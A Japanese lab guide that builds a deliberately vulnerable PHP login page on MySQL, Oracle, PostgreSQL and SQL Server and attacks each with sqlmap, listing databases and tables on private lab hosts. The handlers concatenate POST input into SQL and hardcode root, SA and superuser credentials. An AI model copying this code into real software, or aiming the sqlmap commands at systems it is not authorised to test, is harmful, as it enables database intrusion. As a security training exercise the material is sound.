PHP+Apache+sqlmap

 

(MySQL 8.0.31)

https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://happyquality.com/2013/02/11/2587.htm


前提:
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み


-- 1. phpインストール

# EPEL + Remi repositories, then PHP 7.4 with the MySQL extension.
yum -y install epel-release
# Remi release package fetched over plain http here; the Rocky Linux 8 section
# further down uses the https host (rpms.remirepo.net) for the same repository.
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm
ls -l /etc/yum.repos.d/

yum repolist all

yum -y search php74
yum -y install php74 php74-php php74-php-pecl-mysql

# Confirm the mysqli extension is loaded before writing the login page.
php74 -i | grep mysqli

 

-- 2. Apacheインストール


yum -y install httpd

systemctl enable httpd
systemctl restart httpd
systemctl status httpd


# phpinfo() page used only to verify the Apache/PHP wiring. It discloses the
# full PHP configuration to anyone who can reach the URL, so remove it once
# the check below passes.
echo '<?php phpinfo(); ?>' > /var/www/html/info.php

http://192.168.137.66/info.php

 

-- 3. 攻撃対象サイト作成

# Interactive mysql client on the lab database; the SQL that follows runs inside this session.
mysql test

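-- Lab fixture: a one-row users table holding the plaintext credentials the
-- login page compares against. IF EXISTS makes the script re-runnable.
drop table if exists users;
create table users(name varchar(30) ,pwd varchar(30) );

-- Explicit column list so the row does not depend on column order.
insert into users (name, pwd) values('admin','admin');

select name, pwd from users;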

exit

# Verifies the root/password credentials that sql_injection.php will embed.
# MYSQL_PWD keeps the password off the command line (and out of shell history),
# though it remains readable in the process environment on the same host.
MYSQL_PWD='password' mysql -h localhost -u root test
exit

 


# Both lab files are written straight into Apache's document root, so they are
# reachable at the URLs shown below as soon as they are saved.
cd /var/www/html

vim sql_injection.html

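<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<!-- Login form for the lab: posts NAME and PWD to sql_injection.php, which
     interpolates both values into its query unchanged. -->
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
<!-- type="password" masks the value on screen; the submitted field name is unchanged. -->
パスワード<input type="password" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>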

# Handler that the form above posts to.
vim sql_injection.php

<?php
  // Deliberately vulnerable login handler (MySQL/mysqli variant) for the
  // sqlmap exercise below: NAME and PWD from the POST body are interpolated
  // into the SQL text unchanged.
  session_start();
  header('Content-Type: text/html; charset=UTF-8');
  // '@' hides the undefined-index notice when a field is missing; a missing
  // field then interpolates as an empty string.
  $name = @$_POST['NAME'];
  $pwd = @$_POST['PWD'];
  // Connects as root with the password from the DB setup step. The return
  // value is not checked, so a failed connection only surfaces at mysqli_query.
  $con = mysqli_connect('localhost', 'root', 'password', 'test');
  // Injection point: both values are concatenated unescaped into the statement.
  // The non-vulnerable form is mysqli_prepare() with '?' placeholders and
  // mysqli_stmt_bind_param() for the two values.
  $sql = "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'";
  // mysqli_query() returns false for a statement MySQL rejects; not handled here.
  $rs = mysqli_query($con, $sql);
?>
<html>
<body>
<?php
  // Any returned row counts as a successful login. mysqli_num_rows(false)
  // emits a warning when the query above failed.
  if (mysqli_num_rows($rs) > 0) {
    $_SESSION['name'] = $name;
    echo 'ログイン成功';
  } else {
    echo 'ログイン失敗';
  }
  mysqli_close($con);
?>
</body>
</html>

 

# Smoke run with the Remi PHP 7.4 CLI binary: there is no POST data, so NAME and
# PWD interpolate as empty strings and the DB connection itself is exercised.
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php

http://192.168.137.66/sql_injection.html

 


-- 4. sqlmapインストール
# sqlmap from the upstream git repository at whatever commit HEAD is today;
# check out a tagged release if the environment is kept beyond this lab.
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap


-- 5. 動作確認

# Built-in help; confirms the clone runs under this Python.
python sqlmap.py --help

# Target the handler directly with a POST body carrying the two fields that
# sql_injection.php interpolates (NAME, PWD). Each run produces a burst of POST
# requests against the lab host, which should be visible in Apache's access log.
python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2"

# Same target; list database names once the injection has been confirmed.
python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2" --dbs

# Restrict to the lab database created above and list its tables.
python sqlmap.py -u "http://192.168.137.66/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables

 

(Oracle Database 19c)


https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://nodachisoft.com/common/jp/article/jp000046/
https://www.php.net/manual/ja/function.oci-fetch-row.php


前提:
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み


-- 1. phpインストール

# EPEL + Remi repositories (the Remi release package is fetched over plain http).
yum -y install epel-release
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm

yum repolist all

yum -y search php74
# pear/devel/cli are needed because OCI8 is compiled from PECL source below.
yum -y install php74 php74-php php74-php-pear php74-php-devel php74-php-cli

※↓ エラー 「Cannot find sys/sdt.h which is required for DTrace support」回避のため追加インストール
# systemtap-sdt-devel provides sys/sdt.h, required because PHP_DTRACE=yes is exported before the pecl build.
yum -y install systemtap systemtap-runtime systemtap-sdt-devel


-- 2. Oracle Instant Clientインストール

# Oracle Instant Client 19.17 (basic + devel headers) over https. The version
# must match the C_INCLUDE_PATH used for the OCI8 build below.
yum -y install https://download.oracle.com/otn_software/linux/instantclient/1917000/oracle-instantclient19.17-basic-19.17.0.0.0-1.x86_64.rpm

yum -y install https://download.oracle.com/otn_software/linux/instantclient/1917000/oracle-instantclient19.17-devel-19.17.0.0.0-1.x86_64.rpm

 

-- 3. OCI8インストール

# OCI8 built from PECL source. The tarball is fetched over https, but nothing
# here verifies the download's integrity before it is compiled and loaded into
# the web server; add that step if this is reused beyond a throwaway lab.
wget https://pecl.php.net/get/oci8-2.2.0.tgz

# Registers the extension for the Remi PHP 7.4 tree. Written before the build,
# so "php74 -i | grep OCI" below only succeeds once the pecl install has.
echo "extension=oci8.so" > /etc/opt/remi/php74/php.d/90_oci8.ini

# DTrace probes on; this is what makes sys/sdt.h (systemtap-sdt-devel) required.
export PHP_DTRACE=yes

# Header search path for the 19.17 Instant Client installed above.
C_INCLUDE_PATH=/usr/lib/oracle/19.17/client64 /opt/remi/php74/root/usr/bin/pecl install oci8-2.2.0.tgz

 

# Confirm the OCI8 extension is loaded before writing the login page.
php74 -i | grep OCI

 

-- 4. Apacheインストール


yum -y install httpd

systemctl enable httpd
systemctl restart httpd
systemctl status httpd


# phpinfo() page used only to verify the Apache/PHP wiring. It discloses the
# full PHP configuration to anyone who can reach the URL, so remove it once
# the check below passes.
echo '<?php phpinfo(); ?>' > /var/www/html/info.php

http://192.168.137.65/info.php

 

-- 5. 攻撃対象サイト作成

su - oracle
# Lab account test/test on the pluggable database. Putting the password in the
# connect string exposes it in shell history and the process list; sqlplus
# prompts for it when only "test@..." is given.
sqlplus test/test@localhost:1521/pdb1.example.com

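-- Lab fixture: a one-row users table holding the plaintext credentials the
-- login page compares against. PURGE bypasses the recycle bin; 19c has no
-- IF EXISTS, so the first run reports ORA-00942 here and carries on.
drop table users purge;
create table users(name varchar2(30) ,pwd varchar2(30) );

-- Explicit column list so the row does not depend on column order.
insert into users (name, pwd) values('admin','admin');
commit;

select name, pwd from users;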

exit

exit


# Both lab files are written straight into Apache's document root, so they are
# reachable at the URLs shown below as soon as they are saved.
cd /var/www/html

vim sql_injection.html

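<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<!-- Login form for the lab: posts NAME and PWD to sql_injection.php, which
     interpolates both values into its query unchanged. -->
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
<!-- type="password" masks the value on screen; the submitted field name is unchanged. -->
パスワード<input type="password" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>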

 

# Handler that the form above posts to.
vim sql_injection.php

<?php
  // Deliberately vulnerable login handler (Oracle/OCI8 variant) for the sqlmap
  // exercise below: NAME and PWD from the POST body are interpolated into the
  // SQL text unchanged.
  session_start();
  header('Content-Type: text/html; charset=UTF-8');
  // '@' hides the undefined-index notice when a field is missing; a missing
  // field then interpolates as an empty string.
  $name = @$_POST['NAME'];
  $pwd = @$_POST['PWD'];
  // Same account and service name as the sqlplus session above. The return
  // value is not checked, so a failed connection only surfaces at oci_parse.
  $con = oci_connect('test', 'test', 'localhost:1521/pdb1.example.com');
  // Injection point: both values are concatenated unescaped into the statement.
  // The non-vulnerable form is a :placeholder per value in the statement text
  // plus oci_bind_by_name() for each.
  $stid = oci_parse($con, "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'");
  // oci_execute() returns false for a statement Oracle rejects; not handled here.
  oci_execute($stid);
?>
<html>
<body>
<?php
  // oci_fetch_row() returns the first row as an array, or false when there is
  // none. The "> 0" only works because PHP orders an array above an int;
  // "!== false" would state the intent directly.
  if (oci_fetch_row($stid) > 0) {
    $_SESSION['name'] = $name;
    echo 'ログイン成功';
  } else {
    echo 'ログイン失敗';
  }
  oci_close($con);
?>
</body>
</html>

 

# Smoke run with the Remi PHP 7.4 CLI binary: there is no POST data, so NAME and
# PWD interpolate as empty strings and the OCI connection itself is exercised.
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php

http://192.168.137.65/sql_injection.html

 


-- 6. sqlmapインストール
# sqlmap from the upstream git repository at whatever commit HEAD is today;
# check out a tagged release if the environment is kept beyond this lab.
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap


-- 7. 動作確認

# Built-in help; confirms the clone runs under this Python.
python sqlmap.py --help

# Target the handler directly with a POST body carrying the two fields that
# sql_injection.php interpolates (NAME, PWD). Each run produces a burst of POST
# requests against the lab host, which should be visible in Apache's access log.
python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2"

# Same target; list database names once the injection has been confirmed.
python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2" --dbs

# Restrict to the lab schema created above and list its tables.
python sqlmap.py -u "http://192.168.137.65/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables

 

 

(PostgreSQL 15)

https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://www.server-world.info/query?os=Rocky_Linux_8&p=httpd&f=6


前提:
攻撃元と攻撃先は同一サーバ (OS: Rocky Linux 8)
DB作成済み


-- 1. phpインストール

# Remi repository (fetched over https here), then PHP 7.4 with the PostgreSQL extension.
dnf -y install https://rpms.remirepo.net/enterprise/remi-release-8.rpm
dnf repolist all

dnf -y search php74
dnf -y install php74 php74-php php74-php-pgsql

# Confirm the pgsql extension is loaded before writing the login page.
php74 -i | grep pgsql

 

-- 2. Apacheインストール


# On this host Apache serves PHP through php-fpm, so both services are managed together.
dnf -y install httpd php-fpm

systemctl enable httpd php-fpm
systemctl restart httpd php-fpm
systemctl status httpd php-fpm


# phpinfo() page used only to verify the Apache/PHP wiring. It discloses the
# full PHP configuration to anyone who can reach the URL, so remove it once
# the check below passes.
echo '<?php phpinfo(); ?>' > /var/www/html/info.php

http://192.168.137.55/info.php

 

-- 3. 攻撃対象サイト作成

# Local socket login as the postgres OS user; the SQL that follows runs inside this psql session.
su - postgres
psql test

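-- Lab fixture: a one-row users table holding the plaintext credentials the
-- login page compares against. IF EXISTS makes the script re-runnable.
drop table if exists users;
create table users(name varchar(30) ,pwd varchar(30) );

-- Explicit column list so the row does not depend on column order.
insert into users (name, pwd) values('admin','admin');

select name, pwd from users;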


-- Sets the superuser password that sql_injection.php's pg_connect() string and
-- the next psql login use. The lab connects as the superuser; a dedicated role
-- with rights on "users" only would be the least-privilege form.
alter user postgres with password 'postgres';
\q

# Verifies the TCP login that the PHP page will use. PGPASSWORD keeps the
# password off the command line, though it remains readable in the process
# environment on the same host.
PGPASSWORD=postgres psql -h localhost -d test -U postgres 
\q

exit

 

# Both lab files are written straight into Apache's document root, so they are
# reachable at the URLs shown below as soon as they are saved.
cd /var/www/html

vim sql_injection.html

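<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<!-- Login form for the lab: posts NAME and PWD to sql_injection.php, which
     interpolates both values into its query unchanged. -->
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
<!-- type="password" masks the value on screen; the submitted field name is unchanged. -->
パスワード<input type="password" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>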

# Handler that the form above posts to.
vim sql_injection.php

<?php
  // Deliberately vulnerable login handler (PostgreSQL variant) for the sqlmap
  // exercise below: NAME and PWD from the POST body are interpolated into the
  // SQL text unchanged.
  session_start();
  header('Content-Type: text/html; charset=UTF-8');
  // '@' hides the undefined-index notice when a field is missing; a missing
  // field then interpolates as an empty string.
  $name = @$_POST['NAME'];
  $pwd = @$_POST['PWD'];
  // Superuser credentials set in the psql session above, embedded in the
  // connection string. The return value is not checked.
  $con = pg_connect("host=localhost dbname=test user=postgres password=postgres");
  // Injection point: both values are concatenated unescaped into the statement.
  // The non-vulnerable form is pg_query_params() with $1/$2 placeholders and
  // the two values passed as the parameter array.
  $sql = "SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'";
  // pg_query() returns false for a statement PostgreSQL rejects; not handled here.
  $rs = pg_query($con, $sql);
?>
<html>
<body>
<?php
  // Any returned row counts as a successful login. pg_num_rows(false)
  // emits a warning when the query above failed.
  if (pg_num_rows($rs) > 0) {
    $_SESSION['name'] = $name;
    echo 'ログイン成功';
  } else {
    echo 'ログイン失敗';
  }
  pg_close($con);
?>
</body>
</html>

# Smoke run with the Remi PHP 7.4 CLI binary: there is no POST data, so NAME and
# PWD interpolate as empty strings and the DB connection itself is exercised.
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php

http://192.168.137.55/sql_injection.html


-- 4. sqlmapインストール
# sqlmap from the upstream git repository at whatever commit HEAD is today;
# check out a tagged release if the environment is kept beyond this lab.
dnf -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap


-- 5. 動作確認

# Built-in help; confirms the clone runs under python3 (the RL8 default).
python3 sqlmap.py --help

# Target the handler directly with a POST body carrying the two fields that
# sql_injection.php interpolates (NAME, PWD). Each run produces a burst of POST
# requests against the lab host, which should be visible in Apache's access log.
python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2"

# Same target; list database names once the injection has been confirmed.
python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2" --dbs

# Unlike the other sections this run has no "-D test", so the table listing is
# not limited to the lab database; add it to keep the output comparable.
python3 sqlmap.py -u "http://192.168.137.55/sql_injection.php" --data "NAME=1&PWD=2" --tables

 

 

(SQL Server 2019)


https://qiita.com/shyamahira/items/9f80d16c3436f9dea753
https://stackoverflow.com/questions/31569675/pdo-equivalent-of-mysql-num-rows-or-mssql-num-rows


前提:
攻撃元と攻撃先は同一サーバ (OS: CentOS7)
DB作成済み


-- 1. phpインストール

# EPEL + Remi repositories (the Remi release package is fetched over plain http),
# then PHP 7.4 with the SQL Server PDO driver.
yum -y install epel-release
yum -y install http://rpms.famillecollet.com/enterprise/remi-release-7.rpm

yum repolist all

yum -y search php74
yum -y install php74 php74-php php74-php-sqlsrv

# Confirm the PDO drivers are loaded before writing the login page.
php74 -i | grep PDO


-- 2. Apacheインストール


yum -y install httpd

systemctl enable httpd
systemctl restart httpd
systemctl status httpd


# phpinfo() page used only to verify the Apache/PHP wiring. It discloses the
# full PHP configuration to anyone who can reach the URL, so remove it once
# the check below passes.
echo '<?php phpinfo(); ?>' > /var/www/html/info.php

http://192.168.137.127/info.php

 

-- 3. 攻撃対象サイト作成

# SA login for the fixture. "-P" puts the password on the command line, where it
# lands in shell history and the process list; sqlcmd prompts for it when -P is omitted.
sqlcmd -S localhost -U SA -P 'password'


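-- sqlcmd buffers everything up to "go" and runs it as one batch, so the USE
-- and the statements below execute together.
use test

-- Lab fixture: a one-row users table holding the plaintext credentials the
-- login page compares against. IF EXISTS (SQL Server 2016+) makes the batch re-runnable.
drop table if exists users;
create table users(name varchar(30) ,pwd varchar(30) );

-- Explicit column list so the row does not depend on column order.
insert into users (name, pwd) values('admin','admin');

select name, pwd from users;
go

quit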

 

# Both lab files are written straight into Apache's document root, so they are
# reachable at the URLs shown below as soon as they are saved.
cd /var/www/html

vim sql_injection.html

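<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="utf-8">
<title>ログイン</title>
</head>
<body>
<!-- Login form for the lab: posts NAME and PWD to sql_injection.php, which
     interpolates both values into its query unchanged. -->
<form action="sql_injection.php" method="POST">
ユーザ名<input type="text" name="NAME"><br>
<!-- type="password" masks the value on screen; the submitted field name is unchanged. -->
パスワード<input type="password" name="PWD"><br>
<input type="submit" value="ログイン">
</form>
</body>
</html>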

 

# Handler that the form above posts to.
vim sql_injection.php

<?php
  // Deliberately vulnerable login handler (SQL Server via PDO_SQLSRV) for the
  // sqlmap exercise below: NAME and PWD from the POST body are interpolated
  // into the SQL text unchanged.
  session_start();
  header('Content-Type: text/html; charset=UTF-8');
  // '@' hides the undefined-index notice when a field is missing; a missing
  // field then interpolates as an empty string.
  $name = @$_POST['NAME'];
  $pwd = @$_POST['PWD'];
  
  // Connection settings: the SA account from the sqlcmd session above.
  $user = 'SA';
  $pass = 'password';
  $host = 'localhost';
  $port = 1433;
  $dbname = 'test';
  $dsn = "sqlsrv:server=$host,$port;database=$dbname";
  // No PDO::ATTR_ERRMODE is set, so under PHP 7.4 PDO stays silent on errors:
  // a rejected statement makes query() return false and the fetchAll() below
  // fails with a fatal "call to a member function on bool".
  $con = new PDO($dsn, $user, $pass);
  // Injection point: both values are concatenated unescaped into the statement.
  // The non-vulnerable form is $con->prepare() with placeholders and
  // execute() carrying the two values.
  $pst = $con->query("SELECT * FROM users WHERE name ='$name' and pwd = '$pwd'");
  $result = $pst->fetchAll(PDO::FETCH_ASSOC);
?>
<html>
<body>
<?php
  // Any returned row counts as a successful login.
  if (count($result) > 0) {
    $_SESSION['name'] = $name;
    echo 'ログイン成功';
  } else {
    echo 'ログイン失敗';
  }
  // Dropping the last reference releases the PDO connection.
  $con = null;
?>
</body>
</html>

 

# Smoke run with the Remi PHP 7.4 CLI binary: there is no POST data, so NAME and
# PWD interpolate as empty strings and the PDO connection itself is exercised.
/opt/remi/php74/root/usr/bin/php /var/www/html/sql_injection.php

http://192.168.137.127/sql_injection.html

 


-- 4. sqlmapインストール
# sqlmap from the upstream git repository at whatever commit HEAD is today;
# check out a tagged release if the environment is kept beyond this lab.
yum -y install git
cd
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap


-- 5. 動作確認

# Built-in help; confirms the clone runs under this Python.
python sqlmap.py --help

# Target the handler directly with a POST body carrying the two fields that
# sql_injection.php interpolates (NAME, PWD). Each run produces a burst of POST
# requests against the lab host, which should be visible in Apache's access log.
python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2"

# Same target; list database names once the injection has been confirmed.
python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2" --dbs

# Restrict to the lab database created above and list its tables.
python sqlmap.py -u "http://192.168.137.127/sql_injection.php" --data "NAME=1&PWD=2" -D test --tables